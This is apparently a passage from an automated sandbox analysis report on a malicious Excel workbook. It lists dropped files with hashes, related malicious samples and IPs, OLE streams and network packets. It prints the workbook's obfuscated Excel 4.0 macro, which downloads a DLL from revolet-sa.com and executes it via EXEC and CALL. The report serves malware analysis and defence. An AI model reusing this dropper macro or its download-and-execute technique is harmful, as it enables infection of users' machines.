                  catalogue-41.xlsbGet hashmaliciousBrowse
                  • 108.167.180.111
                  documents-1660683173.xlsmGet hashmaliciousBrowse
                  • 192.185.56.250
                  06iKnPFk8Y.dllGet hashmaliciousBrowse
                  • 162.241.54.59
                  06iKnPFk8Y.dllGet hashmaliciousBrowse
                  • 162.241.54.59
                  ddff.exeGet hashmaliciousBrowse
                  • 108.179.235.108
                  PowerShell_Input.ps1Get hashmaliciousBrowse
                  • 162.241.61.203
                  New PO#700-20-HDO410444RF217,pdf.exeGet hashmaliciousBrowse
                  • 192.185.122.118
                  Purchase Order.9000.scan.pdf...exeGet hashmaliciousBrowse
                  • 162.241.148.243
                  document-1848152474.xlsmGet hashmaliciousBrowse
                  • 192.185.48.186
                  7z7Q51Y8Xd.dllGet hashmaliciousBrowse
                  • 162.241.54.59
                  pySsaGoiCT.dllGet hashmaliciousBrowse
                  • 162.241.54.59

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\3M1Xc[1].fbxSecuriteInfo.com.Trojan.Agent.FFFK.8079.xlsGet hashmaliciousBrowse
                    SecuriteInfo.com.Trojan.Agent.FFFK.23764.xlsGet hashmaliciousBrowse
                      SecuriteInfo.com.Heur.19090.xlsGet hashmaliciousBrowse
                        SecuriteInfo.com.Heur.4923.xlsGet hashmaliciousBrowse
                          SecuriteInfo.com.Heur.4923.xlsGet hashmaliciousBrowse
                            C:\Users\user\sdbybsd.fdsSecuriteInfo.com.Trojan.Agent.FFFK.8079.xlsGet hashmaliciousBrowse
                              SecuriteInfo.com.Trojan.Agent.FFFK.23764.xlsGet hashmaliciousBrowse
                                SecuriteInfo.com.Heur.19090.xlsGet hashmaliciousBrowse
                                  SecuriteInfo.com.Heur.4923.xlsGet hashmaliciousBrowse
                                    SecuriteInfo.com.Heur.4923.xlsGet hashmaliciousBrowse

                                      Created / dropped Files

                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\3M1Xc[1].fbx
                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:downloaded
                                      Size (bytes):688241
                                      Entropy (8bit):7.064532901692121
                                      Encrypted:false
                                      SSDEEP:12288:9SeIHklNAPLJNfQPJt7TQJK7FvEVxw0xxteW:AklUjfQHDezxxtx
                                      MD5:7DF0611CD75FA4C02B29070728C37247
                                      SHA1:1095F8922D93458EFBC97612D8A5DEA8DB8325A5
                                      SHA-256:AC17E1F54B9F800D874E1D012E541FC037BD1A31EE3E8F631A454F2D1DE6ADA1
                                      SHA-512:167B19FE1154C3988A546F9626CD8918363EAB58D5BB49106000EF4E6E9AC0174A04B7341A67BF85CA1F9AB40C409F878C4AFA07BE941FEAADA7AFA996A4EA59
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Metadefender, Detection: 5%, Browse
                                      • Antivirus: ReversingLabs, Detection: 2%
                                      Joe Sandbox View:
                                      • Filename: SecuriteInfo.com.Trojan.Agent.FFFK.8079.xls, Detection: malicious, Browse
                                      • Filename: SecuriteInfo.com.Trojan.Agent.FFFK.23764.xls, Detection: malicious, Browse
                                      • Filename: SecuriteInfo.com.Heur.19090.xls, Detection: malicious, Browse
                                      • Filename: SecuriteInfo.com.Heur.4923.xls, Detection: malicious, Browse
                                      • Filename: SecuriteInfo.com.Heur.4923.xls, Detection: malicious, Browse
                                      Reputation:low
                                      IE Cache URL:http://revolet-sa.com/files/countryyelow.php
                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........O.N.............1...............1..........i/..92......R1..!...R1..+....(......R1......Rich............................PE..L....Kl`...........!.........@......>8..............................................................................@a..S............@.......................`..d^...................................................................................text...6u.......................... ..`.rdata..............................@..@.data........p...@...p..............@....idata...1.......@..................@....rsrc........@... ..................@..@.reloc...e...`...p..................@..B........................................................................................................................................................................................................................................................................
                                      C:\Users\user\AppData\Local\Temp\0ACE0000
                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):67965
                                      Entropy (8bit):7.879459857289466
                                      Encrypted:false
                                      SSDEEP:1536:Ltke3BrWGHJyW32AeWviHcM8OlMVGoIahaDHTU6hryF70E:LqeRrW2JyW32AiHD2sTU2yF70E
                                      MD5:9842F73BEBDA1F816A21C9C89EBF722C
                                      SHA1:44635E0DC6B4D2104DEB0812E58B62D69EE9D5A7
                                      SHA-256:472A639EF51E8A9CDFD06E797CA8CF99C7BB85AEED79160D0F367D7784365155
                                      SHA-512:1E1EAA02771CE00C5B036D53CED95C0CB3A436AD8A4825743870258FEBF0873D3DAADD006D2C81AEC38C2F5A5A654D8C8322BE2204FF5726AC08E43D483A3BDF
                                      Malicious:false
                                      Reputation:low
                                      Preview: .U[O.0.~........&M......i.....o....~..2......\l....xy.)Y<....U.R.f.........;)|..A..5.'.../...E_D..5iC.?(..E..2.u.i.S..[S.l.k...7...C...Y-...G......X.&..n]...P....(.U3...43.q(......A...O..e)..UD.5.....PH3os...q?..8.....nA......1..0Ir.|..CY..1T..3...$.9........4...|..i........V.:....R..<.#..kd...=W.....e..}U.Q...~./qC........L3..>l%.#..).tJ....Wp.M~.....>...d....{O4..@..6......{H?..;g......^:xB.6......>.!......uFL..G>.M.........PK..........!..r.............[Content_Types].xml ...(............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-966771315-3019405637-367336477-1006\f554348b930ff81505ce47f7c6b7d232_ea860e7a-a87f-4a88-92ef-38f744458171
                                      Process:C:\Windows\SysWOW64\rundll32.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):2178
                                      Entropy (8bit):7.012005948259818
                                      Encrypted:false
                                      SSDEEP:48:Kb6UYQ7XLdcm1BjUYKpnb6UY8tfeDof3zAI88Yehn:Kb6CFcm1BWnb6mfeofDf8In
                                      MD5:66EC936451064576E96053814B524D8E
                                      SHA1:9B0D556322E3776F656038D6324B2238DF7C83F1
                                      SHA-256:FAACB5E4238A45B5C6ECFEFA3820080F50C331FF2B95173AB47EF3AA4743731E
                                      SHA-512:EEAC85A510219DA071735DFC3B35CA13E56F65E404D3609D1B1453B5F8D7A1DD5C8AD799EC3E13406B7232C3A08B20E17160DAE5F61D93866D480E0A352E33B9
                                      Malicious:false
                                      Reputation:low
                                      Preview: ........................................user.....................\...................user.....................RSA1H.......?...........}...h8...B~k..!.R..<.HN:D...tW....5g.n.xLu5..tI. .q5e.. ........................z..O.........x.E......;t....,...C.r.y.p.t.o.A.P.I. .P.r.i.v.a.t.e. .K.e.y....f...... ....}..v.<..:.8.T.$.......]....`J............ ....n..o'.*...e...]l.q[Hn...-..\.......<......T..)...j>m...c..2u.Y.qI.}s.i..i...=...k.?~.QM...l.........g..X..$.P&.v1L.`..8..A..M...e}...h?w2...x5S...M.X.C...c._9b...*%'....t(...H..}]._...P..j.t(.QV..jP...4....dg...B...c...G...I.W.....Uj....;..3.mO...b:..H....L....;o....ldJ8P.G.....|pF<._J;.gR..k.#.pV5#=...Q.)...N.!....+...k....Y.<.&A....h..}..@T"a..9.l=.k..F..gp..[.B]......e..C..y..H,..,"X!.h.,..P..{...5.A.}C..@.....U....-|.kVZ....hN..=..r...!%8y.:.DV;......0Lc./*..y1{.s.r.~..............z..O.........x.E......;t........E.x.p.o.r.t. .F.l.a.g....f...... .....,..Pw.QP..V..@:>.\R.!.Q.ngpDmh............ ...>...u...
                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\1A8C92C-1A8C92C.LNK
                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:12 2020, mtime=Wed Apr 7 13:09:37 2021, atime=Wed Apr 7 13:09:37 2021, length=92160, window=hide
                                      Category:dropped
                                      Size (bytes):2078
                                      Entropy (8bit):4.49395331622355
                                      Encrypted:false
                                      SSDEEP:48:8pxn/XT3IkcSeJozQqQh2pxn/XT3IkcSeJozQqQ/:8p9/XLIkqqzQqQh2p9/XLIkqqzQqQ/
                                      MD5:B9C87F86AB426BAB220239030DDDAA10
                                      SHA1:69F13975ED848B8C8D8D3C998A3A9E4298C6E68E
                                      SHA-256:F83451C275FA9E90AFB786F281A07F8CC0703E520ACBD9C18F8B0C8F433F8279
                                      SHA-512:6A1685DCCCC5E146F07606B3AFA2F5B029F525108171B226860635A85BEBB45B25569659AD116BFCBC7E75F554C57AAEADD317F4317D283E44A4C57DD414BCBB
                                      Malicious:false
                                      Reputation:low
                                      Preview: L..................F.... ...&w...{..Y...+...H...+...h...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....p.2......R/q .1A8C92~1.XLS..T.......Q.y.Q.y*...8.....................1.A.8.C.9.2.C.-.1.A.8.C.9.2.C...x.l.s.......}...............-...8...[............?J......C:\Users\..#...................\\374653\Users.user\Desktop\1A8C92C-1A8C92C.xls.*.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.1.A.8.C.9.2.C.-.1.A.8.C.9.2.C...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......374653..........D_....3N...W...9F.C.........
                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Wed Apr 7 13:09:37 2021, atime=Wed Apr 7 13:09:37 2021, length=12288, window=hide
                                      Category:dropped
                                      Size (bytes):867
                                      Entropy (8bit):4.477005331237777
                                      Encrypted:false
                                      SSDEEP:12:85QBO3b3cLgXg/XAlCPCHaXgzB8IB/PxiUUDpX+Wnicvb8X+bDtZ3YilMMEpxRld:85hjK/XTwz6IbiJYePDv3qdwrNru/
                                      MD5:0F73A8D021A01CD04B71B4D1081CBC66
                                      SHA1:C1E9F58BAA5178BD16B9B7322E28AEBD092B0DCF
                                      SHA-256:F1D5434B6F42340A44592D8908A68513E429FA019BDA1D7887D4DEE412011997
                                      SHA-512:19B9390DCE4DD7AA3008BE3526FCA7B5A694808CB338B65115C571C3A349601BB1E47937A8897C49409C4D18B70496BF31CCC605FB41544DB2B0607223D6729C
                                      Malicious:false
                                      Reputation:low
                                      Preview: L..................F...........7G..Y...+..Y...+...0......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......R3q..Desktop.d......QK.X.R3q*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\374653\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......374653..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):98
                                      Entropy (8bit):4.399426680408379
                                      Encrypted:false
                                      SSDEEP:3:oyBVomMMk9WPulGmWPulmMMk9WPulv:dj6aWYrWxaW1
                                      MD5:9D94E53C38653B25AE525F0CC2253B09
                                      SHA1:90F33DAD1FCA3415C790A0072B9F07B05DF2A3BB
                                      SHA-256:BE1F754789EF0A781C85FD38FC5D45C7B925D0A8636F3B02792F9F90E1ABE14C
                                      SHA-512:94F02CBB4B181764B0E5C9173B8473A8D274ECE8B5A39CC1FA20FEF7F09D770232E9A4CAF46B8180561087A3ED03EDF0D6B616DDF10F25136A0CCF4D1A7B1BB3
                                      Malicious:false
                                      Reputation:low
                                      Preview: Desktop.LNK=0..[xls]..1A8C92C-1A8C92C.LNK=0..1A8C92C-1A8C92C.LNK=0..[xls]..1A8C92C-1A8C92C.LNK=0..
                                      C:\Users\user\Desktop\8ACE0000
                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                      File Type:Applesoft BASIC program data, first line number 16
                                      Category:dropped
                                      Size (bytes):127008
                                      Entropy (8bit):7.230491021864619
                                      Encrypted:false
                                      SSDEEP:3072:ZI8rmjAItyzElBIL6lECbgBGGP5xLmuCSi2jTUqyF70Si2W2vXmw5vXmwQI8rmjy:G8rmjAItyzElBIL6lECbgBvP5NmuCSh5
                                      MD5:63317E50375F30B46FECFDE3EBADCC4A
                                      SHA1:09DF3BB631603B67550B02176C577ADFF1B810AB
                                      SHA-256:D4F8728B67702276E5DF6DBDBCC2950D03E59DB7390D3348A0A6EA40AA68C9C2
                                      SHA-512:384B7A81EE7CC6D6068280D19D8B1D020801DA2BF29EC0D63AF53B9DF683EBDD9406AEA8B11E566E0AEC944DBBABF8CC9B6259F87FB7B7BB04577E77B72E2D58
                                      Malicious:false
                                      Reputation:low
                                      Preview: ........g2..........................\.p....user B.....a.........=.................................................=.....i..9J.8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...,...8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1...h...8...........C.a.m.b.r.i.a.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...@...8...........C.a.l.i.b.r.i.1...@...............C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.........
                                      C:\Users\user\sdbybsd.fds
                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):688241
                                      Entropy (8bit):7.064532901692121
                                      Encrypted:false
                                      SSDEEP:12288:9SeIHklNAPLJNfQPJt7TQJK7FvEVxw0xxteW:AklUjfQHDezxxtx
                                      MD5:7DF0611CD75FA4C02B29070728C37247
                                      SHA1:1095F8922D93458EFBC97612D8A5DEA8DB8325A5
                                      SHA-256:AC17E1F54B9F800D874E1D012E541FC037BD1A31EE3E8F631A454F2D1DE6ADA1
                                      SHA-512:167B19FE1154C3988A546F9626CD8918363EAB58D5BB49106000EF4E6E9AC0174A04B7341A67BF85CA1F9AB40C409F878C4AFA07BE941FEAADA7AFA996A4EA59
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Metadefender, Detection: 5%, Browse
                                      • Antivirus: ReversingLabs, Detection: 2%
                                      Joe Sandbox View:
                                      • Filename: SecuriteInfo.com.Trojan.Agent.FFFK.8079.xls, Detection: malicious, Browse
                                      • Filename: SecuriteInfo.com.Trojan.Agent.FFFK.23764.xls, Detection: malicious, Browse
                                      • Filename: SecuriteInfo.com.Heur.19090.xls, Detection: malicious, Browse
                                      • Filename: SecuriteInfo.com.Heur.4923.xls, Detection: malicious, Browse
                                      • Filename: SecuriteInfo.com.Heur.4923.xls, Detection: malicious, Browse
                                      Reputation:low
                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........O.N.............1...............1..........i/..92......R1..!...R1..+....(......R1......Rich............................PE..L....Kl`...........!.........@......>8..............................................................................@a..S............@.......................`..d^...................................................................................text...6u.......................... ..`.rdata..............................@..@.data........p...@...p..............@....idata...1.......@..................@....rsrc........@... ..................@..@.reloc...e...`...p..................@..B........................................................................................................................................................................................................................................................................

                                      Static File Info

                                      General

                                      File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Last Saved By: 5, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Apr 6 15:04:37 2021, Security: 0
                                      Entropy (8bit):3.0873527347414935
                                      TrID:
                                      • Microsoft Excel sheet (30009/1) 78.94%
                                      • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                      File name:1A8C92C-1A8C92C.xls
                                      File size:267776
                                      MD5:d8ed80402de2b621219044b3a2c022c5
                                      SHA1:e2f86c9431081da7f57cc014a9f2f7b870ea0aad
                                      SHA256:d98b11f1599985cc16c8dd10ea53ea5a1b9ac752d5d30c460c198b4a2a83ad9b
                                      SHA512:1bc7b3a5973019ded3a136824ea54653d3189d729e3e07a811082844829362c3f4dd78c478d2aaea0c0e044092d4d96cd0a6b1e8b7ccbb8ba89ad1814e723540
                                      SSDEEP:6144:JcPiTQAVW/89BQnmlcGvgZ7rDjo8UOMIJK+xTh0E:FhE
                                      File Content Preview:........................>......................................................................................................................................................................................................................................

                                      File Icon

                                      Icon Hash:e4eea286a4b4bcb4

                                      Static OLE Info

                                      General

                                      Document Type:OLE
                                      Number of OLE Files:1

                                      OLE File "1A8C92C-1A8C92C.xls"

                                      Indicators

                                      Has Summary Info:True
                                      Application Name:Microsoft Excel
                                      Encrypted Document:False
                                      Contains Word Document Stream:False
                                      Contains Workbook/Book Stream:True
                                      Contains PowerPoint Document Stream:False
                                      Contains Visio Document Stream:False
                                      Contains ObjectPool Stream:
                                      Flash Objects Count:
                                      Contains VBA Macros:True

                                      Summary

                                      Code Page:1251
                                      Last Saved By:5
                                      Create Time:2006-09-16 00:00:00
                                      Last Saved Time:2021-04-06 14:04:37
                                      Creating Application:Microsoft Excel
                                      Security:0

                                      Document Summary

                                      Document Code Page:1251
                                      Thumbnail Scaling Desired:False
                                      Contains Dirty Links:False

                                      Streams

                                      Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                      General
                                      Stream Path:\x5DocumentSummaryInformation
                                      File Type:data
                                      Stream Size:4096
                                      Entropy:0.342986545458
                                      Base64 Encoded:False
                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . D o c s 3 . . . . . D o c s 1 . . . . . D o c s 2 . . . . . D o c s 4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E x c e l 4 . 0 . . . . . . . . . . . .
                                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 d0 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 0b 00 00 00 38 00 00 00 10 00 00 00 40 00 00 00 0d 00 00 00 48 00 00 00 0c 00 00 00 8d 00 00 00 02 00 00 00 e3 04 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 1e 10 00 00 05 00 00 00
                                      Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                      General
                                      Stream Path:\x5SummaryInformation
                                      File Type:data
                                      Stream Size:4096
                                      Entropy:0.247889866731
                                      Base64 Encoded:False
                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . 8 . . . . . . . @ . . . . . . . L . . . . . . . d . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . 5 . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . H L . . * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 84 00 00 00 06 00 00 00 01 00 00 00 38 00 00 00 08 00 00 00 40 00 00 00 12 00 00 00 4c 00 00 00 0c 00 00 00 64 00 00 00 0d 00 00 00 70 00 00 00 13 00 00 00 7c 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00 35 00 00 00 1e 00 00 00
                                      Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 255780
                                      General
                                      Stream Path:Book
                                      File Type:Applesoft BASIC program data, first line number 8
                                      Stream Size:255780
                                      Entropy:3.03349063455
                                      Base64 Encoded:True
                                      Data ASCII:. . . . . . . . . 7 . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . 5 B . . . . . . . . . . . . . . . . . . . . . . . D o c s 1 . . ! . . . . . . . . . . . . . . . : . . . . . . . . . . . . . . . . 7 . . . . . . . . . . . . . . . . . . = . . . . . i . . 9 J . 8 . . . . . . . X .
                                      Data Raw:09 08 08 00 00 05 05 00 17 37 cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 01 35 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                      Macro 4.0 Code

                                      ,,,,,,"=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=FORMULA(Docs3!$BE$26&Docs3!$BE$27&Docs3!$BE$28&""n"",BV9)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=Docs2!AI20()",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=EXEC(""r""&Docs3!BB33&Docs3!BB37&Docs3!BM23&Docs3!BI33&Docs3!BI36)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=Docs4!BA9()",,,,,,
                                      ,,http://,,,"=""php""",,"=""revolet-sa.com/files/countryyelow""",,,,,,,,,,,,,,,,,,,,,,,"=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=FORMULA.ARRAY(""U""&Docs3!$BH$26&Docs3!$BH$27&Docs3!$BH$28&Docs3!$BH$29,Docs1!BV10)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)",,,,,,,,,,"=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=CALL(Docs1!BV9,Docs1!BV10,Docs3!BK26&Docs3!BK28,0,before.3.13.34.sheet!AK14&before.3.13.34.sheet!AK15&Docs3!BP25&before.3.13.34.sheet!AN14,Docs3!BM23,0,0)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=Docs1!$AX$27()",,,,,
                                      =HALT()

                                      Network Behavior

                                      Network Port Distribution

                                      TCP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Apr 7, 2021 07:09:58.570271015 CEST4916580192.168.2.22192.232.249.186
                                      Apr 7, 2021 07:09:58.731540918 CEST8049165192.232.249.186192.168.2.22
                                      Apr 7, 2021 07:09:58.731767893 CEST4916580192.168.2.22192.232.249.186
                                      Apr 7, 2021 07:09:58.734183073 CEST4916580192.168.2.22192.232.249.186
                                      Apr 7, 2021 07:09:58.895291090 CEST8049165192.232.249.186192.168.2.22
                                      Apr 7, 2021 07:09:59.150906086 CEST8049165192.232.249.186192.168.2.22
                                      Apr 7, 2021 07:09:59.150963068 CEST8049165192.232.249.186192.168.2.22
                                      Apr 7, 2021 07:09:59.151001930 CEST8049165192.232.249.186192.168.2.22
                                      Apr 7, 2021 07:09:59.151041031 CEST8049165192.232.249.186192.168.2.22
                                      Apr 7, 2021 07:09:59.151087999 CEST8049165192.232.249.186192.168.2.22
                                      Apr 7, 2021 07:09:59.151182890 CEST4916580192.168.2.22192.232.249.186
                                      Apr 7, 2021 07:09:59.151196003 CEST8049165192.232.249.186192.168.2.22
                                      Apr 7, 2021 07:09:59.151231050 CEST8049165192.232.249.186192.168.2.22
                                      Apr 7, 2021 07:09:59.151268959 CEST4916580192.168.2.22192.232.249.186
                                      Apr 7, 2021 07:09:59.151279926 CEST8049165192.232.249.186192.168.2.22
                                      Apr 7, 2021 07:09:59.151288033 CEST4916580192.168.2.22192.232.249.186
                                      Apr 7, 2021 07:09:59.151295900 CEST4916580192.168.2.22192.232.249.186
                                      Apr 7, 2021 07:09:59.151323080 CEST8049165192.232.249.186192.168.2.22
